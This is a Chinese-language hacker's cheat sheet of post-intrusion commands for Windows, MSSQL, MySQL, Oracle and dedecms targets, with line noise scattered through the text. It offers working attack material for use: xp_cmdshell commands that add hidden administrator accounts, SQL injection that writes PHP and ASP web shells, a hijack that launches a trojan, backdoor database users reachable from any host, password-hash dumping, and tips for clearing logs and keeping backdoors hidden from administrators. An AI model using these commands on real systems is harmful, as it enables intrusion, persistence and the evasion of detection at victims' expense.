6 ` k7 _8 F0 J! E6 i: ~* Y1.net user administrator /passwordreq:no
, B4 @' D* M: n; w" J这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了" p. W; ?2 y- w: Z
2.比较巧妙的建克隆号的步骤5 y8 K r0 a" C* e* o' L% L
先建一个user的用户: g2 j7 ^, `0 z- e' Y0 H
然后导出注册表。然后在计算机管理里删掉$ o+ i2 M& @) I0 T5 s7 ^- u% `% i9 p5 k
在导入,在添加为管理员组# }6 l3 ]: m' U0 c1 c8 ? x( \
3.查radmin密码
' Q0 r, L1 I/ X1 A C8 Yreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg" U2 O Q: m- n v' E
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]; ^* J' P" v. d9 | a% f
建立一个"services.exe"的项; V) l- D/ b6 {9 V+ i- h3 c
再在其下面建立(字符串值), r) X1 u7 q6 M. `% Y4 g. z1 d8 b: |
键值为mu ma的全路径- ~' Q; T- X1 b& {* X/ b
5.runas /user:guest cmd3 z# ]2 B ~1 _% v
测试用户权限!; K ?+ |* ^1 ^1 K
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
. g( s4 c5 V4 \3 F/ g1 P7.入侵后漏洞修补、痕迹清理,后门置放:4 j" v/ R+ q0 `5 X9 M
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门. N. ]* N) G1 Y* m% r& ^" h
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c/ i; Z7 ]9 J4 M9 p" m
9 U9 O. B" A) ~for example2 @; |, c2 e+ q& i/ v. E" m
5 V" X7 E5 u7 H0 \* Y7 k5 J
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'- H+ S. ?7 L6 y
; v9 d% T. n# v2 Udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
6 l1 i6 V$ L" }& L4 J. B: Z2 E# H
D) \" h( W$ ]' P4 d) t9:MSSQL SERVER 2005默认把xpcmdshell 给ON了: O) Q: |0 F5 m3 ~3 i2 I
如果要启用的话就必须把他加到高级用户模式
" J3 V4 `; w7 o% u. r6 P9 I8 D可以直接在注入点那里直接注入) P* ^8 I5 ^ `# G
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
& u$ A2 g1 V. }8 ^0 V# {$ B# n. M然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
! Q+ g3 k' _& z0 {/ b: ]1 ?或者
+ X3 {/ Z. x, R$ S* a1 s' ksp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
- }% x/ q& ^. C' Z/ ]( t来恢复cmdshell。5 ]9 X( x' P: b" C9 p |
: s5 O7 q5 ?8 ]) E/ K* i6 G分析器& E, b. C* \' c4 t9 ^; x9 Y+ L
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--+ V4 h5 `* _5 I$ w% G
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
4 s& u, @& r- L& ~3 C10.xp_cmdshell新的恢复办法
% H# I/ N2 s+ w3 ?: v* T5 sxp_cmdshell新的恢复办法3 M) M+ @1 _( W. @" Y
扩展储存过程被删除以后可以有很简单的办法恢复:
1 n- w+ O u, ~. `删除% _* d) s+ p7 M
drop procedure sp_addextendedproc
6 h2 {/ W6 G. bdrop procedure sp_oacreate
3 @; H- h+ r% q& qexec sp_dropextendedproc 'xp_cmdshell'
2 Q6 r1 p; C2 j% W4 N* F& i+ [" H. d( O" M+ d
恢复6 Z/ Z# O1 J$ i1 W/ ^+ g
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
* V. Y# r; R( K: Zdbcc addextendedproc ("xp_cmdshell","xplog70.dll")
+ y# f* r+ }6 s' O& S/ D7 k* T5 j; {, w. U/ E& U3 N
这样可以直接恢复,不用去管sp_addextendedproc是不是存在& W( h7 j' h, k
4 Y) u! `7 |3 d0 L% i p
-----------------------------
/ `4 X9 ?/ ?; K4 F* t, x) d/ y' W4 r2 p7 D+ v) T; O3 J6 Z2 H! D
删除扩展存储过过程xp_cmdshell的语句:
& p" G, B' k3 hexec sp_dropextendedproc 'xp_cmdshell'
8 c% P, v4 H, {* \6 S v% a. e: P+ K- }: T2 A7 @: A/ W) C3 s
恢复cmdshell的sql语句6 Q, u+ R2 f3 V+ d, |3 ~
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
" c1 C5 O6 r2 N/ F+ A+ U4 W% L& a1 F8 l$ f0 d
3 L3 |1 _" _0 c- C$ Y0 Z开启cmdshell的sql语句- q ]% _; h w2 V
9 d1 [7 H3 o* S T) P! k; T2 l, {" Aexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
) ~: R7 \ w' N( x$ o! D9 m/ S
+ o& `# O* Q, C2 i0 _判断存储扩展是否存在
- A2 ]3 e. Q1 ]1 V, l) Rselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' Z; Z* q R- E$ s+ a; o+ ^
返回结果为1就ok
0 [9 q N: r( @" E, p$ h! U
4 w2 z7 ?# l `( u" O恢复xp_cmdshell
6 q/ G* D* O, |) Uexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
( y5 B( ?& A% N3 [! A返回结果为1就ok, Q' o2 U) w! N# ?/ r/ l/ {, k+ l
4 I. `, [, x- C+ |" g否则上传xplog7.0.dll
) y2 e* K' w1 k4 R4 `exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'; F2 H' a5 A1 L/ O3 U
" g' H- d; n* P, S# f堵上cmdshell的sql语句
8 U# P3 I; r7 _( i! ~sp_dropextendedproc "xp_cmdshel# w2 ^$ J) P) ^- v
-------------------------4 e+ w, Q. {: O- K4 |
清除3389的登录记录用一条系统自带的命令:
. M: B' v- u! q& i( U& G3 p# Lreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f$ ^( H8 R! {/ e2 i7 {! E3 h
+ j4 p5 _9 z! c: m然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件/ Y# {! z8 x5 k" ]! J
在 mysql里查看当前用户的权限
) _' I. F0 d7 O, Qshow grants for / a# _1 B2 L8 ?' k
: s8 E6 s4 v. ]+ J3 _
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
: @9 k4 W# G1 ^8 u1 k
2 G( m0 M# p; S
8 V7 o" q* K2 d# ]# S. QCreate USER 'itpro'@'%' IDENTIFIED BY '123';
& K6 T0 H" d% t i+ f' Z1 H9 G3 S- Z/ g X6 K4 Q6 b
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION Z( V- g+ ?5 Y
1 w7 }* [1 {" g9 Z/ O3 ]; I
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0; H! V5 S9 X0 Q
; D8 |4 v% H& c; M; U6 L- dMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;- e2 `4 G3 n# M1 D! C8 Y+ @+ n
& V; a9 H! @5 E* E搞完事记得删除脚印哟。
9 w- }) g# Q% E7 m" G- C$ @/ Y
, w5 @2 V& a6 e( _+ {. h8 |- uDrop USER 'itpro'@'%';
. i1 G; V" h$ w8 c& F. W. k
5 X: Y" ]4 ^; v; |+ ^8 NDrop DATABASE IF EXISTS `itpro` ;+ |( q$ ~# c$ v4 p
. t9 X$ i) O1 [9 F' u4 N
当前用户获取system权限9 V: Z" \/ z+ E' l. T$ }( f
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact6 U3 P$ c9 c$ p W
sc start SuperCMD# A8 j; D0 e2 h u
程序代码" h+ J e9 J' s0 K; O$ m
<SCRIPT LANGUAGE="VBScript">
: Q) ^/ G% i9 v, Uset wsnetwork=CreateObject("WSCRIPT.NETWORK")' E0 f+ [3 k7 t' K8 f- P0 x. E
os="WinNT://"&wsnetwork.ComputerName
" R7 h; W: V6 X- tSet ob=GetObject(os): D: o4 _3 r5 X
Set oe=GetObject(os&"/Administrators,group")
, b, z* v# W+ X7 [9 B8 H3 |Set od=ob.Create("user","nosec")4 M5 v5 _5 U/ y; _3 z/ a5 E& }
od.SetPassword "123456abc!@#"3 G2 U" N" N0 A: O
od.SetInfo
2 l' b" k7 P+ d+ w. n( P2 SSet of=GetObject(os&"/nosec",user)
: Z, d5 W/ L" x" T5 e" xoe.add os&"/nosec"
( ~4 z2 X. X1 `$ R- C* E' ?</Script>
3 I2 w* J O* D* x8 b<script language=javascript>window.close();</script>
C( g- i4 C/ J
/ Q. x, l- Z: a- m" S( o
$ a! `! ] ~) b
7 t2 F+ R/ R9 y- M$ [( e7 M: u6 s- s( X% S1 H6 ^) s
突破验证码限制入后台拿shell
6 a: [, R1 A0 W9 N程序代码2 M9 L" [ M5 u: f& i R# G# ^
REGEDIT4 6 e6 r' I' V+ o! H
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
0 ?" Y! k" l+ R+ u$ v+ {3 \: l"BlockXBM"=dword:00000000
6 L7 c, j4 W% Q( Z# J+ l
6 V1 Y" v7 v$ d' @; q保存为code.reg,导入注册表,重器IE* U! Z! h+ `: o6 q$ c
就可以了
( {% p' {9 z1 w: Gunion写马/ p3 g. g' \4 U# j, I
程序代码! S" M6 |! h& b2 D$ u+ n! T
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*6 P$ f: x. @ X0 l3 J A
# d2 G1 k- L$ `" t9 [* Z
应用在dedecms注射漏洞上,无后台写马, q! o6 x3 ?9 C% J+ s5 f; O
dedecms后台,无文件管理器,没有outfile权限的时候5 R' ?, }( H! z2 h8 T/ y+ G
在插件管理-病毒扫描里7 {9 n; N; U, w! {/ {5 [
写一句话进include/config_hand.php里# r9 @: J5 Q$ x3 }. ]
程序代码* M" c6 D; e2 g& p
>';?><?php @eval($_POST[cmd]);?>+ @6 t$ C- B4 q3 @5 V3 }
! t1 J4 N: F. V" Z' [! W* t$ ?2 Y$ u3 j3 C
如上格式
2 M7 G b" [' |/ U, O5 `) }
- K, }9 L2 {! woracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
o2 _$ h9 c$ x4 R" }$ @程序代码. @( l" R6 O# W% d+ Q
select username,password from dba_users;
' U) Q4 @, A& G( w. A# d2 W/ E
5 _6 n# M+ n' A: z4 T4 x. {) _% Y/ \( t6 J2 \8 ~+ I* B
mysql远程连接用户: q' |3 ?6 X/ B/ R2 }& P2 o
程序代码
/ }$ C. D j' q. {& W; \# H+ M8 q; K1 L0 {! d2 H/ E
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';, H1 m2 L w3 j+ S7 ^
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION/ F# m V2 f4 l: `4 S S3 n
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
e* {( n/ t, m; C# L6 `MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
. z0 K, \4 e6 W) O2 {0 F) [7 B, u$ u* a% Q, L
3 c8 Z- x+ r; R; m9 r& k, d
) {7 c- o9 e: y1 O% f8 T' l* W. t8 L, M9 I
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
3 a9 O% o0 t4 p) K
0 ^! D' ^( H% T: }1.查询终端端口. T/ F, z4 {) j8 b5 v8 | A
q' T1 Q A) m" b) \. z! q
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
7 _; w f. T1 [( x- h7 T5 A* e e, o* y: Q! M
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
f0 k; H) K4 Gtype tsp.reg
- W8 J3 C* r% S/ i
' ~* i3 D! u, J( i1 E& @2.开启XP&2003终端服务
/ H9 ~& m1 I& Z3 I: H" {
2 h+ i# Z5 `. t7 w+ ]1 \( Y% Q. J
) f7 l1 ~$ h) L# |REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f$ |9 P2 O) q6 f6 Y" c' |) T q
' \: |8 s5 r! R0 q% ]
! w7 o! m% N" S0 L: J( |& E% DREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f$ R2 m$ [' v6 K2 b0 W! ^' G
. C/ p/ ?; Y6 ]/ C9 q
3.更改终端端口为20008(0x4E28)
1 s" ]9 B, @8 l8 s' z* w* ]6 |6 S6 \" ~8 u A, Z h
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
; s N5 N5 D& ?1 z1 d5 j( b( M4 D
* s( x9 o: H6 b; F: |$ y' Q) yREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
$ l6 q0 U5 r5 P9 s2 n, C: {
: J/ w8 z- \$ |) |! j4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
' V5 W3 h, \0 D {: r5 ]% K1 T$ X' U; n, a; K* F6 j
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f$ m; G$ h" M7 j9 c* N( T
0 j6 L( o: c' _. P @+ ?) @8 n/ i; ]. {, p' g6 v; Q
5.开启Win2000的终端,端口为3389(需重启)! |9 s* q5 g2 p5 Q$ G% d/ C
$ ]3 r, Y+ r; @( z" _. Z; t8 \echo Windows Registry Editor Version 5.00 >2000.reg
2 X6 T+ c2 t# v$ ]4 xecho. >>2000.reg
7 P/ R- v# \( {) K! I5 Becho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 4 C G2 x' p, x( }5 z
echo "Enabled"="0" >>2000.reg ) c/ s% h$ V0 B' Q% g, }6 ^4 @
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg $ l0 ?8 x1 f+ M! k6 f- O4 R
echo "ShutdownWithoutLogon"="0" >>2000.reg - V% q3 E( w: i
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 0 `' M5 ^8 T- j
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
( L7 d& Q/ A6 O+ S- _ K' K. w+ @- e6 Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg # r- t) \/ |8 D5 c6 H: a# r
echo "TSEnabled"=dword:00000001 >>2000.reg
9 v6 v# \: V& k' Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
A1 I: `7 z2 V0 H" t7 l/ e2 Decho "Start"=dword:00000002 >>2000.reg * ]' W/ h# t2 w: ?* a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
9 h2 J4 ?( d7 a% J% s4 S5 Gecho "Start"=dword:00000002 >>2000.reg
8 g9 K5 k, B4 e0 e( ~$ n& wecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
, B& `3 g( u7 N! [* [$ fecho "Hotkey"="1" >>2000.reg 1 t- {4 J6 D0 h6 ~/ ]' F8 w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 8 @& N' L4 ]& }3 t" _3 M L
echo "ortNumber"=dword:00000D3D >>2000.reg ' u' V6 `% T5 L; o% H" }2 @. s
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg * \( W+ X. C' M- [% @ A: x! y
echo "ortNumber"=dword:00000D3D >>2000.reg
" \1 v; t1 e# a4 V7 O
- V) U) K+ g0 n* O% M; e6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)2 x$ D, G, i g5 R' B6 _
0 t- c7 S2 {" E1 i( l@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
" H6 o( S7 w+ z# c: a' V(set inf=InstallHinfSection DefaultInstall)
, Y, W7 K3 F7 f6 Fecho signature=$chicago$ >> restart.inf$ H0 O6 g' }0 s: [ y
echo [defaultinstall] >> restart.inf
! ?. }6 p8 R. L; H, P) Yrundll32 setupapi,%inf% 1 %temp%\restart.inf9 F. _0 T! P6 P+ }2 r4 k
; b' s1 ]' ]% I3 j
9 Z3 K. Z+ m( G0 J# D, G* B, i/ x
7.禁用TCP/IP端口筛选 (需重启)
) Z C; y; O" \$ J; ~
9 z6 a% x. U$ C9 @+ YREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f/ {- ^/ j0 T1 Y. G o* N1 C: K
1 ?6 R0 j* G1 K* g8.终端超出最大连接数时可用下面的命令来连接
# X# S0 Y5 O N3 x/ E: ^5 W6 [8 L8 r! q. |1 l
mstsc /v:ip:3389 /console; P3 F( A; c4 S& X5 A
. a+ ^. }: F: m3 D" S
9.调整NTFS分区权限
: x$ D: G8 a7 z% F8 S* Z
; {( F- d/ j0 z* |cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
; W( w- T% y: R2 o+ d
: c0 d1 R8 r, H" l. f$ T1 `( D% wcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
2 J% [: r- T, s: q ?2 k# Y
& L# X) g3 g/ Y/ }4 K! t6 E( _% C1 z& K# a------------------------------------------------------; r5 F$ N" `' ]" N2 k# }: w/ m
3389.vbs
- @) H: R4 d3 x6 S9 H- [On Error Resume Next
0 H2 @0 E: e9 |! E: m( E" m8 p3 |const HKEY_LOCAL_MACHINE = &H80000002
7 Q4 J4 G9 T: a6 H8 a, Q kstrComputer = "." F5 \3 \ N5 e; k; L7 ], q3 G
Set StdOut = WScript.StdOut
+ [5 j( X+ C, ^$ ?: {3 J) r3 h4 hSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
* K; ?2 s' ]& h- q( g* O# lstrComputer & "\root\default:StdRegProv")
9 w) [6 E. H, F5 t" k- R7 cstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"% l: N$ t$ F* A# B3 H( w' x/ @. N
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath# c+ x# T. W' E! B; f. d
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
' _; b( i8 v* U' }oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath% t4 c; k4 W2 D; b
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"% `+ J) E+ O, P9 C% o
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"1 U5 b7 f) Z J! j- b/ s/ ]9 [
strValueName = "fDenyTSConnections"
- M8 U8 B' ^' OdwValue = 0( v4 r- W. F1 @! _: y
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
8 W$ m3 `: m# _* T" a, ?5 GstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
: t- B- r) P8 |& ^strValueName = "ortNumber"
7 ~' [6 }/ q6 @# `6 MdwValue = 3389+ l- z h+ j5 T0 c5 R+ f
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue+ y7 @! O2 ?2 S
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
& i$ x) \+ X( V: g+ o4 ]! nstrValueName = "ortNumber"
4 y5 U! \! b( R& J8 x# B0 f8 E0 AdwValue = 3389
$ l) l% o( m7 I$ _7 {! Toreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
( m9 P' p0 T. M- |0 j6 G0 |- KSet R = CreateObject("WScript.Shell")
/ Q. y0 H, U. v+ a& b; P( j/ p6 Z7 JR.run("Shutdown.exe -f -r -t 0")
4 {) }8 W; m$ J, W% Q' H9 H) w% N. @ a9 a/ D/ F" v$ r
删除awgina.dll的注册表键值& ?, b" D& ~5 P1 i4 F/ l2 l
程序代码3 @) _( [! s7 m2 D7 }% _9 \
# v" c* l8 e# O, `0 W! N& areg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f! a( B( n8 b2 G# x" A+ d( L
0 B3 z& Y8 b/ s7 p! b( `
y h4 P* }2 H
3 y9 L! d: P+ @! l# q' K r
$ _& a. w9 v/ c+ ?( S8 _程序代码
/ }7 I* I+ v- }6 j) Y% {HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
: M+ @( T9 |; S& |
# ? C& V4 W5 q设置为1,关闭LM Hash
( o% b7 }# Y8 O$ `1 _4 V
/ N' s" D' a& @' D4 R' ?数据库安全:入侵Oracle数据库常用操作命令6 R3 J) n& ?3 C- d8 V$ W- s
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。4 o- n: C& Y/ |: M& Z" k% I
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。6 k! J; Q1 `/ y6 C
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;- w" d. O$ S+ M8 R. p1 e/ B7 \, E
3、SQL>connect / as sysdba ;(as sysoper)或
+ m0 P4 x2 I& R! A+ g& D: M) _connect internal/oracle AS SYSDBA ;(scott/tiger)
3 z8 a% @9 ^9 bconn sys/change_on_install as sysdba;8 M$ Z, L/ N9 H7 ?% [( O
4、SQL>startup; 启动数据库实例
4 U. @+ u& ]8 l5、查看当前的所有数据库: select * from v$database;
) @' P8 l' S8 l4 g& u, Qselect name from v$database;
+ d7 C0 ~# |% u( ^7 z3 E* {; U! ~! i! k6、desc v$databases; 查看数据库结构字段
3 x9 ^5 G* z# ?8 T; R7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
4 X# D/ O6 \% ZSQL>select * from V_$PWFILE_USERS;% Y; f; h5 b6 l: @# Q/ B6 u
Show user;查看当前数据库连接用户* `% p1 k! ^* `- f
8、进入test数据库:database test;: I% t, _, U8 r% W! M# H, z; q$ O
9、查看所有的数据库实例:select * from v$instance;) t8 `3 q( { i* n
如:ora9i D4 A9 e9 u4 w
10、查看当前库的所有数据表:
) e( P! U2 W1 G+ R2 G% MSQL> select TABLE_NAME from all_tables;
1 x8 C; Y4 r5 Q- fselect * from all_tables;
( t8 j4 l4 S* i$ q3 h4 YSQL> select table_name from all_tables where table_name like '%u%';
- z& q# S; a/ JTABLE_NAME
0 h( J% ^. E7 J9 O------------------------------
4 `2 R9 f- M! c/ V3 P- ^2 r_default_auditing_options_
5 [3 {1 t: J8 J( b2 e( ^11、查看表结构:desc all_tables;( N! R% N/ [7 {/ y
12、显示CQI.T_BBS_XUSER的所有字段结构:
1 ~( U& L5 b' j! `desc CQI.T_BBS_XUSER;
* u- L" w8 b W5 @8 {& v13、获得CQI.T_BBS_XUSER表中的记录:
4 M* H6 X* p) |4 ^# Y+ {select * from CQI.T_BBS_XUSER;6 ]5 h8 x# p, R1 L0 t
14、增加数据库用户:(test11/test)4 N2 [2 s" R- ^, S4 t4 f- R4 H# E
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;2 i: M" g$ k4 H4 |: c: u
15、用户授权:
: f- b5 O5 {; h% b8 @* {grant connect,resource,dba to test11;4 S8 p @% H& |
grant sysdba to test11;( N; v& P' J" L% s2 X
commit;
" A: X4 P0 j, L( f% B16、更改数据库用户的密码:(将sys与system的密码改为test.)
+ K# m7 j9 Q* H, {alter user sys indentified by test;
; w$ P) {3 S5 M) c+ _alter user system indentified by test;
6 o$ p3 l; K) I7 |/ F; I0 q! ?8 q. f. e. l7 C$ b: |
applicationContext-util.xml
- e3 B% H1 _# z& ~applicationContext.xml
4 i6 W7 D+ C; f9 }$ Zstruts-config.xml
: i N# P" {% j0 p, S) Bweb.xml
. Q2 M& K) x+ Z4 kserver.xml
5 s N4 e/ ]1 qtomcat-users.xml
- R9 m: w, J g$ mhibernate.cfg.xml
# u( `. G( C& f+ g' L; |database_pool_config.xml. y6 T7 e/ O7 z
& [# ~5 q+ P4 M# x, o0 m/ F" z
) \& O. F; i5 r3 h
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置! Z7 v2 P# M* C, X8 K Z4 f; q
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
- ?- t8 z$ K" ]2 |5 T" _4 E\WEB-INF\struts-config.xml 文件目录结构
5 a9 u! k2 K6 F
% s( ?: e: G' S) Y& ?& [' a1 Sspring.properties 里边包含hibernate.cfg.xml的名称
1 z. r* B8 N- q* k8 \2 }# G+ Z, L. Z. R8 b. c, j( \
7 G& L2 E9 t8 z' q" a$ KC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml: J" w6 ]: {' n; }
: e4 d8 Y" l6 j+ A+ h% h. o如果都找不到 那就看看class文件吧。。' F5 ]8 L/ k) c3 ~" @ ], r$ g9 Q
1 V" z+ t5 i/ l4 P- Z
测试1:$ a$ D9 x% B2 }" |9 m0 J# n6 t
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
4 {) N5 L8 u& w. p0 p7 E4 L" Q2 w4 U% B9 Z0 ~- R+ K+ Z
测试2:* {! a! g. |2 J0 {
4 i2 M( ?1 N# V
create table dirs(paths varchar(100),paths1 varchar(100), id int)$ a" a+ P( j, o/ F& w
& K4 @1 F# W& ^delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
5 z1 D# ~7 d7 a/ S( |
$ {. x0 o8 n6 H! N4 s: E: xSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
7 ?* d* K5 \- D( B9 C! j2 H
$ Z4 u! |! ~6 Y3 P查看虚拟机中的共享文件:- _$ g R1 J) b( E' B; H) W
在虚拟机中的cmd中执行
( c0 G* f+ c; d% i) m\\.host\Shared Folders" z% a" j& y5 S" T6 P* E( F
$ }$ v: {* E7 N5 v' D2 n: \/ m7 ucmdshell下找终端的技巧
% X+ [) L4 b7 c+ U5 l( a( \找终端: : u+ G0 K% ?' p% C
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
, x2 W, k/ j: z- t5 d- m* K. D 而终端所对应的服务名为:TermService
: }5 _( K i+ |# }1 D第二步:用netstat -ano命令,列出所有端口对应的PID值! 4 g* }5 i, g2 H
找到PID值所对应的端口4 Y4 K& }5 O; ]) R/ P" W
# L% V4 r$ z# }' k$ o2 C查询sql server 2005中的密码hash/ t+ o0 ^, `' }2 N: c: K: k
SELECT password_hash FROM sys.sql_logins where name='sa'
/ Z0 c* a1 B V; Y: A; vSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a+ @5 i/ I5 t$ U
access中导出shell3 y! ?) J p! U8 W( ?. q
